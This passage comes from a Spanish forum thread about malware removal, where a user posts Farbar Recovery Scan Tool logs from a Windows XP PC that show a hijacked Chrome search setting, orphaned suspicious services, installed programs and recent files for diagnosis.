      URLSearchHook: HKU\S-1-5-21-725345543-706699826-2147250837-1004 - Hook de búsqueda de direcciones URL de Microsoft - {CFBFAE00-17A6-11D0-99CB-00C04FD64497} - C:\WINDOWS\system32\shdocvw.dll (Microsoft Corporation)
      SearchScopes: HKLM -> DefaultScope value is missing
      BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Archivos de programa\Archivos comunes\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2009-02-27] (Adobe Systems Incorporated)
      BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Archivos de programa\Google\Google Toolbar\GoogleToolbar_32.dll [2016-01-19] (Google Inc.)
      Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Archivos de programa\Google\Google Toolbar\GoogleToolbar_32.dll [2016-01-19] (Google Inc.)
      Toolbar: HKU\S-1-5-21-725345543-706699826-2147250837-1004 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Archivos de programa\Google\Google Toolbar\GoogleToolbar_32.dll [2016-01-19] (Google Inc.)
      Handler: http\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Archivos de programa\Archivos comunes\System\Ole DB\MSDAIPP.DLL [2002-05-23] (Microsoft Corporation)
      Handler: http\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Archivos de programa\Archivos comunes\System\Ole DB\MSDAIPP.DLL [2002-05-23] (Microsoft Corporation)
      Handler: https\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Archivos de programa\Archivos comunes\System\Ole DB\MSDAIPP.DLL [2002-05-23] (Microsoft Corporation)
      Handler: https\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Archivos de programa\Archivos comunes\System\Ole DB\MSDAIPP.DLL [2002-05-23] (Microsoft Corporation)
      Handler: ipp\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Archivos de programa\Archivos comunes\System\Ole DB\MSDAIPP.DLL [2002-05-23] (Microsoft Corporation)
      Handler: msdaipp\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Archivos de programa\Archivos comunes\System\Ole DB\MSDAIPP.DLL [2002-05-23] (Microsoft Corporation)
      Handler: msdaipp\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Archivos de programa\Archivos comunes\System\Ole DB\MSDAIPP.DLL [2002-05-23] (Microsoft Corporation)

      FireFox:
      ========
      FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF32.dll [2007-03-28] ()
      FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Archivos de programa\iTunes\Mozilla Plugins\npitunes.dll [2014-02-20] ()
      FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Archivos de programa\Google\Update\1.3.33.3\npGoogleUpdate3.dll [2017-04-12] (Google Inc.)
      FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Archivos de programa\Google\Update\1.3.33.3\npGoogleUpdate3.dll [2017-04-12] (Google Inc.)

      Chrome:
      =======
      CHR DefaultSearchURL: Default -> hxxp://srch.bar/{searchTerms}
      CHR DefaultSuggestURL: Default -> hxxp://srch.bar/?s={searchTerms}
      CHR Profile: C:\Documents and Settings\MiguelTC\Configuración local\Datos de programa\Google\Chrome\User Data\Default [2017-04-20]
      CHR Extension: (Google Drive) - C:\Documents and Settings\MiguelTC\Configuración local\Datos de programa\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-01-20]
      CHR Extension: (YouTube) - C:\Documents and Settings\MiguelTC\Configuración local\Datos de programa\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-01-20]
      CHR Extension: (Búsqueda de Google) - C:\Documents and Settings\MiguelTC\Configuración local\Datos de programa\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-01-20]
      CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Documents and Settings\MiguelTC\Configuración local\Datos de programa\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-09]
      CHR Extension: (Gmail) - C:\Documents and Settings\MiguelTC\Configuración local\Datos de programa\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-01-20]

      ==================== Services (Whitelisted) ====================

      (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

      R2 Apple Mobile Device; C:\Archivos de programa\Archivos comunes\Apple\Mobile Device Support\AppleMobileDeviceService.exe [43336 2014-02-12] (Apple Inc.)
      R2 Bonjour Service; C:\Archivos de programa\Bonjour\mDNSResponder.exe [390504 2011-08-31] (Apple Inc.)
      S2 gupdate; C:\Archivos de programa\Google\Update\GoogleUpdate.exe [144200 2016-01-19] (Google Inc.)
      S3 gupdatem; C:\Archivos de programa\Google\Update\GoogleUpdate.exe [144200 2016-01-19] (Google Inc.)
      S3 gusvc; C:\Archivos de programa\Google\Common\Google Updater\GoogleUpdaterService.exe [194032 2016-01-20] (Google)
      R2 IJPLMSVC; C:\Archivos de programa\Canon\IJPLM\IJPLMSVC.EXE [116104 2010-04-05] ()
      R3 iPod Service; C:\Archivos de programa\iPod\bin\iPodService.exe [553288 2014-02-21] (Apple Inc.)
      R2 LVPrcSrv; C:\Archivos de programa\Archivos comunes\Logishrd\LVMVFM\LVPrcSrv.exe [162648 2010-05-07] (Logitech Inc.)
      S2 MBAMService; C:\Archivos de programa\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
      S3 WMPNetworkSvc; C:\Archivos de programa\Windows Media Player\WMPNetwk.exe [916480 2009-02-04] (Microsoft Corporation)
      S2 cgoql; C:\WINDOWS\system32\wdscqxkd.dll [X]
      S2 qdtrzxcz; C:\WINDOWS\system32\wdscqxkd.dll [X]
      S3 rpcapd; "%ProgramFiles%\WinPcap\rpcapd.exe" -d -f "%ProgramFiles%\WinPcap\rpcapd.ini" [X]

      ===================== Drivers (Whitelisted) ======================

      (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

      S3 Ambfilt; C:\WINDOWS\System32\drivers\Ambfilt.sys [1691480 2009-11-18] (Creative)
      S3 AR5211; C:\WINDOWS\System32\DRIVERS\ar5211.sys [543712 2007-03-27] (Atheros Communications, Inc.) [File not signed]
      R3 AR5416; C:\WINDOWS\System32\DRIVERS\athw.sys [1606976 2013-01-22] (Atheros Communications, Inc.)
      S3 L1c; C:\WINDOWS\System32\DRIVERS\l1c51x86.sys [65136 2011-03-22] (Atheros Communications, Inc.)
      R3 LVPr2Mon; C:\WINDOWS\System32\DRIVERS\LVPr2Mon.sys [25824 2010-05-07] ()
      R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [23256 2015-10-05] (Malwarebytes)
      S3 Monfilt; C:\WINDOWS\System32\drivers\Monfilt.sys [1395800 2009-11-18] (Creative Technology Ltd.)
      R3 MTsensor; C:\WINDOWS\System32\DRIVERS\ASACPI.sys [5810 2004-08-13] ()
      S3 NPF; C:\WINDOWS\System32\drivers\npf.sys [35088 2010-06-25] (CACE Technologies, Inc.)
      R3 pfc; C:\WINDOWS\System32\drivers\pfc.sys [10368 2006-10-02] (Padus, Inc.) [File not signed]
      S3 Secdrv; C:\WINDOWS\System32\DRIVERS\secdrv.sys [27440 2004-08-20] ()
      S4 aswSP; no ImagePath
      S4 IntelIde; no ImagePath
      S3 MAUSB; system32\DRIVERS\mausb.sys [X]
      S0 mgfa; System32\drivers\trif.sys [X]
      U1 WS2IFSL; no ImagePath

      ==================== NetSvcs (Whitelisted) ===================

      (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

      NETSVC: cgoql -> C:\WINDOWS\system32\wdscqxkd.dll ==> No File
      NETSVC: qdtrzxcz -> C:\WINDOWS\system32\wdscqxkd.dll ==> No File

      ==================== One Month Created files and folders ========

      (If an entry is included in the fixlist, the file/folder will be moved.)

      2017-04-20 12:58 - 2017-04-20 12:59 - 00014839 _____ C:\Documents and Settings\MiguelTC\Escritorio\FRST.txt
      2017-04-20 12:58 - 2017-04-20 12:58 - 00000555 _____ C:\Documents and Settings\MiguelTC\Escritorio\JRT.txt
      2017-04-20 12:57 - 2017-04-20 12:57 - 00001224 _____ C:\Documents and Settings\MiguelTC\Escritorio\AdwCleaner[C2].txt
      2017-04-20 12:49 - 2017-04-20 12:49 - 00001304 _____ C:\Documents and Settings\MiguelTC\Escritorio\Malware.txt
      2017-04-20 11:50 - 2017-04-20 12:51 - 00000000 ____D C:\AdwCleaner
      2017-04-20 11:49 - 2017-04-20 12:44 - 00170200 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
      2017-04-20 11:48 - 2017-04-20 11:48 - 00000826 _____ C:\Documents and Settings\All Users\Escritorio\Malwarebytes Anti-Malware.lnk
      2017-04-20 11:48 - 2017-04-20 11:48 - 00000000 ____D C:\Documents and Settings\All Users\Menú Inicio\Programas\Malwarebytes Anti-Malware
      2017-04-20 11:48 - 2017-04-20 11:48 - 00000000 ____D C:\Archivos de programa\Malwarebytes Anti-Malware
      2017-04-20 11:48 - 2015-10-05 09:50 - 00121560 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
      2017-04-20 11:48 - 2015-10-05 09:50 - 00023256 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
      2017-04-20 11:40 - 2017-04-20 11:41 - 22908888 _____ (Malwarebytes ) C:\Documents and Settings\MiguelTC\Escritorio\malwarebytes-anti-malware-2-2-0-1024-multi-win.exe
      2017-04-20 11:39 - 2017-04-20 11:39 - 01766912 _____ (Farbar) C:\Documents and Settings\MiguelTC\Escritorio\FRST.exe
      2017-04-20 11:38 - 2017-04-20 11:38 - 01663672 _____ (Malwarebytes) C:\Documents and Settings\MiguelTC\Escritorio\JRT.exe
      2017-04-20 11:37 - 2017-04-20 11:37 - 04031440 _____ C:\Documents and Settings\MiguelTC\Escritorio\AdwCleaner.exe
      2017-04-20 11:36 - 2017-04-20 11:36 - 09390672 _____ (Piriform Ltd) C:\Documents and Settings\MiguelTC\Escritorio\ccsetup529.exe
      2017-04-19 02:46 - 2017-04-19 03:14 - 00000000 ____D C:\Documents and Settings\MiguelTC\Escritorio\USB
      2017-04-19 02:18 - 2017-04-20 12:13 - 00000000 ____D C:\Avenger
      2017-04-19 01:33 - 2017-04-19 01:33 - 00000000 ____D C:\Documents and Settings\All Users\Datos de programa\AVAST Software
      2017-04-17 11:54 - 2017-04-17 11:54 - 00000000 ____D C:\Documents and Settings\MiguelTC\Escritorio\Boda dvd
      2017-04-13 16:15 - 2017-04-13 16:15 - 00000000 ____D C:\Documents and Settings\MiguelTC\Menú Inicio\Programas\HQ Software Synthesizer
      2017-04-13 16:15 - 2017-04-13 16:15 - 00000000 ____D C:\Archivos de programa\Edirol
      2017-04-13 14:38 - 2017-04-13 14:38 - 00000000 ____D C:\Documents and Settings\MiguelTC\Datos de programa\SSMgre
      2017-04-13 14:31 - 2017-04-13 14:31 - 00000766 _____ C:\Documents and Settings\MiguelTC\Escritorio\Cubase SX.lnk
      2017-04-13 14:31 - 2017-04-13 14:31 - 00000000 ____D C:\Documents and Settings\MiguelTC\Menú Inicio\Programas\Steinberg Cubase SX
      2017-04-13 14:30 - 2017-04-13 16:15 - 00000000 ____D C:\Archivos de programa\Steinberg
      2017-04-13 14:28 - 2017-04-13 16:01 - 00000000 ____D C:\Documents and Settings\MiguelTC\Escritorio\Grabaciones
      2017-04-09 14:55 - 2017-04-09 14:55 - 00000000 ____D C:\Documents and Settings\MiguelTC\Configuración local\Datos de programa\ESET
      2017-04-09 14:38 - 2017-04-09 14:37 - 00086016 _____ C:\WINDOWS\Minidump\Mini040917-01.dmp
      2017-04-09 13:51 - 2017-04-09 13:54 - 00000000 ____D C:\UsbFix
      2017-03-29 23:58 - 2017-03-29 23:58 - 00000000 ____D C:\MSNCleaner
      2017-03-29 23:47 - 2017-03-30 11:06 - 00000000 ____D C:\Archivos de programa\Spybot - Search & Destroy 2
      2017-03-29 23:47 - 2017-03-30 01:07 - 00065536 _____ C:\WINDOWS\system32\config\SpybotSD.evt
      2017-03-29 23:47 - 2017-03-30 01:05 - 00000000 ____D C:\Documents and Settings\All Users\Datos de programa\Spybot - Search & Destroy
      2017-03-29 23:37 - 2017-03-29 23:37 - 00000000 ____D C:\WINDOWS\system32\Drivers\etc\BACKUP
      2017-03-29 01:00 - 2017-03-29 01:00 - 00000000 ____D C:\Documents and Settings\MiguelTC\Configuración local\Datos de programa\IIIQF
      2017-03-29 00:28 - 2017-03-29 00:28 - 00000000 ____D C:\Documents and Settings\All Users\Datos de programa\Malwarebytes

      ==================== One Month Modified files and folders ========

      (If an entry is included in the fixlist, the file/folder will be moved.)

      2017-04-20 12:59 - 2016-01-06 02:43 - 00000000 ____D C:\Documents and Settings\MiguelTC\Configuración local\Temp
      2017-04-20 12:58 - 2016-01-07 00:39 - 00000000 ____D C:\FRST
      2017-04-20 12:58 - 2016-01-06 02:43 - 00000000 __RHD C:\Documents and Settings\MiguelTC\Reciente
      2017-04-20 12:58 - 2016-01-06 02:43 - 00000000 ____D C:\Documents and Settings\MiguelTC\Escritorio
      2017-04-20 12:55 - 2016-01-06 05:32 - 00001098 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
      2017-04-20 12:55 - 2016-01-06 03:01 - 00000000 ____D C:\WINDOWS\system32\logishrd
      2017-04-20 12:55 - 2016-01-06 02:41 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
      2017-04-20 12:55 - 1996-12-19 01:00 - 00021718 ____H C:\WINDOWS\system32\FFASTLOG.TXT
      2017-04-20 12:52 - 2016-01-06 03:05 - 00524288 _____ C:\WINDOWS\system32\config\ACEEvent.evt
      2017-04-20 12:52 - 2016-01-06 02:43 - 00000192 ___SH C:\Documents and Settings\MiguelTC\ntuser.ini
      2017-04-20 12:52 - 2016-01-06 02:41 - 00032516 _____ C:\WINDOWS\SchedLgU.Txt
      2017-04-20 12:33 - 2016-01-06 05:32 - 00001102 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
      2017-04-20 11:57 - 2016-01-06 02:43 - 00000000 __RHD C:\Documents and Settings\MiguelTC\Datos de programa
      2017-04-20 11:51 - 2016-01-06 02:29 - 00000000 ___RD C:\Documents and Settings\All Users\Menú Inicio
      2017-04-20 11:48 - 2016-01-06 02:29 - 00000000 ___RD C:\Documents and Settings\All Users\Menú Inicio\Programas
      2017-04-20 11:48 - 2016-01-06 02:29 - 00000000 ___RD C:\Archivos de programa
      2017-04-20 11:48 - 2016-01-06 02:29 - 00000000 ____D C:\Documents and Settings\All Users\Escritorio
      2017-04-20 11:38 - 2004-08-20 14:00 - 00012984 _____ C:\WINDOWS\system32\wpa.dbl
      2017-04-20 03:36 - 2016-01-22 01:59 - 02976256 ___SH C:\Documents and Settings\MiguelTC\Escritorio\Thumbs.db
      2017-04-20 03:35 - 2016-10-15 12:54 - 00000000 ____D C:\Documents and Settings\MiguelTC\Escritorio\Audio
      2017-04-20 02:39 - 2016-01-15 02:18 - 00104990 _____ C:\Documents and Settings\MiguelTC\wtge61es.HST
      2017-04-20 02:12 - 2016-01-06 03:38 - 00000000 ____D C:\Documents and Settings\MiguelTC\Datos de programa\Adobe
      2017-04-20 02:12 - 2016-01-06 03:23 - 00000000 ____D C:\Documents and Settings\All Users\Datos de programa\Adobe
      2017-04-20 02:06 - 2016-01-06 02:43 - 00000000 ___RD C:\Documents and Settings\MiguelTC\Mis documentos
      2017-04-19 11:41 - 2016-01-06 03:23 - 00000000 ____D C:\Documents and Settings\MiguelTC\Datos de programa\uTorrent
      2017-04-19 02:18 - 2016-01-06 03:23 - 00000000 ____D C:\WINDOWS\Resources
      2017-04-19 02:18 - 2016-01-06 02:28 - 00000000 __RHD C:\Documents and Settings\All Users\Datos de programa
      2017-04-14 10:41 - 2016-01-06 02:37 - 00001185 _____ C:\WINDOWS\OEWABLog.txt
      2017-04-14 10:40 - 2016-01-06 02:28 - 00000000 ____D C:\Documents and Settings
      2017-04-13 22:33 - 2016-01-06 02:43 - 00000000 ___HD C:\Documents and Settings\MiguelTC\Configuración local\Datos de programa
      2017-04-13 20:17 - 2017-03-20 15:15 - 00000000 ____D C:\Documents and Settings\MiguelTC\Escritorio\Vídeo boda
      2017-04-13 16:15 - 2016-01-06 02:43 - 00000000 ____D C:\Documents and Settings\MiguelTC\Menú Inicio\Programas
      2017-04-13 14:38 - 2017-03-20 18:27 - 00000000 ____D C:\Documents and Settings\MiguelTC\Datos de programa\ScreenShot
      2017-04-13 14:37 - 2016-01-06 03:05 - 00017096 _____ C:\Documents and Settings\MiguelTC\Configuración local\Datos de programa\GDIPFONTCACHEV1.DAT
      2017-04-13 14:33 - 2016-01-06 02:28 - 00108600 _____ C:\WINDOWS\system32\FNTCACHE.DAT
      2017-04-13 14:31 - 2016-01-06 03:23 - 00000000 ___HD C:\WINDOWS\inf
      2017-04-13 13:52 - 2016-01-31 02:14 - 00000038 _____ C:\WINDOWS\AviSplitter.INI
      2017-04-09 13:58 - 2016-12-24 21:15 - 00000000 ____D C:\Documents and Settings\MiguelTC\Escritorio\Entradas
      2017-04-09 13:53 - 2016-01-06 02:43 - 00000000 ___HD C:\Documents and Settings\MiguelTC\Configuración local
      2017-04-05 22:51 - 2016-03-06 13:32 - 00000000 ____D C:\Documents and Settings\MiguelTC\Escritorio\Trabajo
      2017-04-05 21:39 - 2016-01-06 02:59 - 00000000 ____D C:\Documents and Settings\All Users\Datos de programa\CanonIJPLM
      2017-03-29 11:18 - 2016-01-20 00:13 - 00000000 ___RD C:\Documents and Settings\MiguelTC\Mis documentos\Mis vídeos
      2017-03-29 00:48 - 2016-01-06 03:23 - 00000000 ____D C:\WINDOWS\mui
      2017-03-28 00:59 - 2016-10-16 04:06 - 00000000 ____D C:\Documents and Settings\MiguelTC\Configuración local\Datos de programa\WMTools Downloaded Files
      2017-03-28 00:58 - 2016-01-06 03:29 - 00082944 _____ C:\Documents and Settings\MiguelTC\Configuración local\Datos de programa\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
      2017-03-26 07:10 - 2016-01-06 02:29 - 00991836 _____ C:\WINDOWS\system32\PerfStringBackup.INI
      2017-03-26 07:10 - 2004-08-20 14:00 - 00453350 _____ C:\WINDOWS\system32\perfh00A.dat
      2017-03-26 07:10 - 2004-08-20 14:00 - 00076570 _____ C:\WINDOWS\system32\perfc00A.dat
      2017-03-22 12:21 - 2017-03-20 13:37 - 00000000 ____D C:\Documents and Settings\MiguelTC\Escritorio\Un libro de poesías

      ==================== Files in the root of some directories =======

      2016-01-20 00:06 - 2016-01-20 03:26 - 0000100 _____ () C:\Documents and Settings\MiguelTC\Datos de programa\AVSDVDPlayer.m3u
      2016-01-06 03:29 - 2017-03-28 00:58 - 0082944 _____ () C:\Documents and Settings\MiguelTC\Configuración local\Datos de programa\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini

      Some files in TEMP:
      ====================
      2017-04-13 16:14 - 2002-09-06 15:32 - 0205312 ____N () C:\Documents and Settings\MiguelTC\Configuración local\Temp\arctic-loop.exe
      2016-11-14 00:52 - 2016-11-14 00:53 - 33870608 _____ (Ellora Assets Corporation ) C:\Documents and Settings\MiguelTC\Configuración local\Temp\FreemakeVideoConverterFull.exe
      2011-05-31 05:47 - 2011-05-31 05:47 - 7510704 _____ (Google Inc.) C:\Documents and Settings\MiguelTC\Configuración local\Temp\GoogleToolbarInstaller_full_signed_7.0.1710.2246.exe
      2016-01-06 02:57 - 2010-02-05 17:46 - 0779600 ____N (CANON INC.) C:\Documents and Settings\MiguelTC\Configuración local\Temp\MSETUP4.EXE

      ==================== Bamital & volsnap ======================

      (There is no automatic fix for files that do not pass verification.)

      C:\WINDOWS\explorer.exe => File is digitally signed
      C:\WINDOWS\system32\winlogon.exe => File is digitally signed
      C:\WINDOWS\system32\svchost.exe => File is digitally signed
      C:\WINDOWS\system32\services.exe => File is digitally signed
      C:\WINDOWS\system32\User32.dll => File is digitally signed
      C:\WINDOWS\system32\userinit.exe => File is digitally signed
      C:\WINDOWS\system32\rpcss.dll => File is digitally signed
      C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
      C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

      ==================== End of FRST.txt ============================

    7. #7
      Usuario Avatar de migueltc78
      Registrado
      abr 2017
      Ubicación
      España
      Mensajes
      8

      Re: Hotmail me va lentísimo

      Additional scan result of Farbar Recovery Scan Tool (x86) Version: 19-04-2017
      Ran by MiguelTC (20-04-2017 12:59:22)
      Running from C:\Documents and Settings\MiguelTC\Escritorio
      Microsoft Windows XP Home Edition Service Pack 2 (X86) (2016-01-06 00:39:20)
      Boot Mode: Normal
      ==========================================================


      ==================== Accounts: =============================

      Administrador (S-1-5-21-725345543-706699826-2147250837-500 - Administrator - Enabled)
      Asistente de ayuda (S-1-5-21-725345543-706699826-2147250837-1000 - Limited - Disabled)
      Invitado (S-1-5-21-725345543-706699826-2147250837-501 - Limited - Disabled)
      MiguelTC (S-1-5-21-725345543-706699826-2147250837-1004 - Administrator - Enabled) => %SystemDrive%\Documents and Settings\MiguelTC
      SUPPORT_388945a0 (S-1-5-21-725345543-706699826-2147250837-1002 - Limited - Disabled)

      ==================== Security Center ========================

      (If an entry is included in the fixlist, it will be removed.)


      ==================== Installed Programs ======================

      (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

      µTorrent (HKLM\...\uTorrent) (Version: 3.1.0 - )
      Adobe Flash Player Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 9.0.45.0 - Adobe Systems Incorporated)
      Adobe Photoshop CS (HKLM\...\{EFB21DE7-8C19-4A88-BB28-A766E16493BC}) (Version: CS - Adobe Systems, Inc.)
      Adobe Reader 9.2 - Español (HKLM\...\{AC76BA86-7AD7-1034-7B44-A92000000001}) (Version: 9.2.0 - Adobe Systems Incorporated)
      Ahead Nero Burning ROM (HKLM\...\Nero - Burning Rom!UninstallKey) (Version: - )
      Ahead NeroVision Express (HKLM\...\NeroVision!UninstallKey) (Version: - )
      Apple Mobile Device Support (HKLM\...\{18D47FA1-0440-48D3-A7E0-DA09537FF471}) (Version: 7.1.1.3 - Apple Inc.)
      Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
      ASIO4ALL (HKLM\...\ASIO4ALL) (Version: 2.13 - Michael Tippach)
      Atheros Communications Inc.(R) AR81Family Gigabit/Fast Ethernet Driver (HKLM\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 1.0.1.47 - Atheros Communications Inc.)
      ATI AVIVO Codecs (Version: 10.0.0.40103 - ATI Technologies Inc.) Hidden
      ATI Catalyst Install Manager (HKLM\...\{2DE42DB8-ADE5-BAB6-7533-2322AC478B82}) (Version: 3.0.816.0 - ATI Technologies, Inc.)
      aTube Catcher versión 3.8 (HKLM\...\{D43B360E-722D-421B-BC77-20B9E0F8B6CD}_is1) (Version: 3.8 - DsNET Corp)
      Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)
      calibre (HKLM\...\{DD649DA2-BBD9-4247-85DD-E04F7C1E8552}) (Version: 1.48.0 - Kovid Goyal)
      CameraHelperMsi (Version: 13.10.1217.0 - Logitech) Hidden
      Canon Inkjet Printer/Scanner/Fax Extended Survey Program (HKLM\...\CANONIJPLM100) (Version: - )
      Canon MP Navigator EX 4.0 (HKLM\...\MP Navigator EX 4.0) (Version: - )
      Canon Solution Menu EX (HKLM\...\CanonSolutionMenuEX) (Version: - )
      CanoScan LiDE 110 Scanner Driver (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_CNQ2414) (Version: - )
      Compatibilidad con Aplicaciones de Apple (HKLM\...\{AAC5D43E-816D-4C2D-8E51-55FFF35BE301}) (Version: 3.0.1 - Apple Inc.)
      Edirol HQ Orchestral v1.01 (HKLM\...\Edirol HQ Orchestral v1.01) (Version: - )
      EPubsoft Adobe PDF ePub DRM Removal 8.9.6 (HKLM\...\{917CB2F3-7BAF-4E1E-9444-1241BF3D6B92}) (Version: 8.9.6 - EPUBSOFT)
      erLT (Version: 1.20.138.34 - Logitech, Inc.) Hidden
      Google Chrome (HKLM\...\Google Chrome) (Version: 49.0.2623.112 - Google Inc.)
      Google Toolbar for Internet Explorer (HKLM\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.7210.1528 - Google Inc.)
      Google Toolbar for Internet Explorer (Version: 1.0.0 - Google Inc.) Hidden
      Google Update Helper (Version: 1.2.183.39 - Google Inc.) Hidden
      Google Update Helper (Version: 1.3.33.3 - Google Inc.) Hidden
      High Definition Audio Driver Package - KB888111 (HKLM\...\KB888111WXPSP2) (Version: 20040219.000000 - Microsoft Corporation)
      HydraVision (Version: 4.2.188.0 - ATI Technologies Inc.) Hidden
      iTunes (HKLM\...\{2F21564D-DE05-4C6D-B21E-08B9D313FAB3}) (Version: 11.1.5.5 - Apple Inc.)
      Malwarebytes Anti-Malware versión 2.2.0.1024 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
      MemoriesOnTV 4.1.2 (HKLM\...\MemoriesOnTV4_is1) (Version: - )
      Microsoft .NET Framework 2.0 (HKLM\...\Microsoft .NET Framework 2.0) (Version: - Microsoft Corporation)
      Microsoft Compression Client Pack 1.0 for Windows XP (HKLM\...\MSCompPackV1) (Version: 1 - Microsoft Corporation)
      Microsoft Office 97 Professional (HKLM\...\Office8.0) (Version: - )
      Microsoft User-Mode Driver Framework Feature Pack 1.0 (HKLM\...\Wudf01000) (Version: - Microsoft Corporation)
      Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
      Opera 11.61 (HKLM\...\Opera 11.61.1250) (Version: 11.61.1250 - Opera Software ASA)
      Photo! 3D Album and Photo! 3D ScreenSaver 1.2 (HKLM\...\My Pictures Editor_is1) (Version: - )
      Photostage, creador de presentaciones fotográficas (HKLM\...\PhotoStage) (Version: 4.05 - NCH Software)
      PowerLine Utility (HKLM\...\{762E248A-F922-42D6-B577-A47B0AB558D2}) (Version: 1.1.810 - TP-LINK)
      Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 5.10.0.6402 - Realtek Semiconductor Corp.)
      Reproductor de Windows Media 11 (HKLM\...\Windows Media Player) (Version: - )
      Software de cámara Web Logitech (HKLM\...\{D40EB009-0499-459c-A8AF-C9C110766215}) (Version: 2.0 - Logitech Inc.)
      Steinberg Cubase SX 1.01 (HKLM\...\Steinberg Cubase SX 1.01) (Version: - )
      TP-LINK TL-WN881ND Driver (HKLM\...\{FDA7E907-6539-42C1-9721-0239C281B336}) (Version: 1.3.1 - TP-LINK)
      UsbFix (HKLM\...\Usbfix) (Version: 9.001 - www.SOSVirus.Net)
      VC80CRTRedist - 8.0.50727.6195 (Version: 1.2.0 - DivX, Inc) Hidden
      Video to Video (HKLM\...\{7F95A744-78DA-4AED-A8F0-A0AF330B8411}_is1) (Version: - Media Converters)
      WebFldrs XP (Version: 9.50.7523 - Microsoft Corporation) Hidden
      Windows Media Format 11 runtime (HKLM\...\Windows Media Format Runtime) (Version: - )
      WinPcap 4.1.2 (HKLM\...\WinPcapInst) (Version: 4.1.0.2001 - CACE Technologies)
      WinZip 15.0 (HKLM\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C240C1}) (Version: 15.0.9411 - WinZip Computing, S.L. )
      Yahoo! Powered (HKLM\...\{1D43F583-4DC3-2403-FC43-54832CC38703}) (Version: - ) <==== ATTENTION

      ==================== Custom CLSID (Whitelisted): ==========================

      (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

      HKU\S-1-5-21-725345543-706699826-2147250837-1004\...\ChromeHTML: -> <==== ATTENTION

      (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

      Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Archivos de programa\Google\Update\GoogleUpdate.exe
      Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Archivos de programa\Google\Update\GoogleUpdate.exe
      Task: C:\WINDOWS\Tasks\PhotoStageSevenDays.job => C:\Archivos de programa\NCH Software\PhotoStage\photostage.exe

      ==================== Shortcuts =============================

      (The entries could be listed to be restored or removed.)

      Shortcut: C:\Documents and Settings\MiguelTC\Favoritos\Sitio para descargas de NCH Software.lnk -> hxxp://www.nchsoftware.com/es/index.htm

      ==================== Loaded Modules (Whitelisted) ==============

      2014-02-12 21:58 - 2014-02-12 21:58 - 00073544 _____ () C:\Archivos de programa\Archivos comunes\Apple\Apple Application Support\zlib1.dll
      2014-02-12 21:58 - 2014-02-12 21:58 - 01044808 _____ () C:\Archivos de programa\Archivos comunes\Apple\Apple Application Support\libxml2.dll
      2016-01-06 02:59 - 2010-04-05 21:55 - 00116104 _____ () C:\Archivos de programa\Canon\IJPLM\IJPLMSVC.EXE
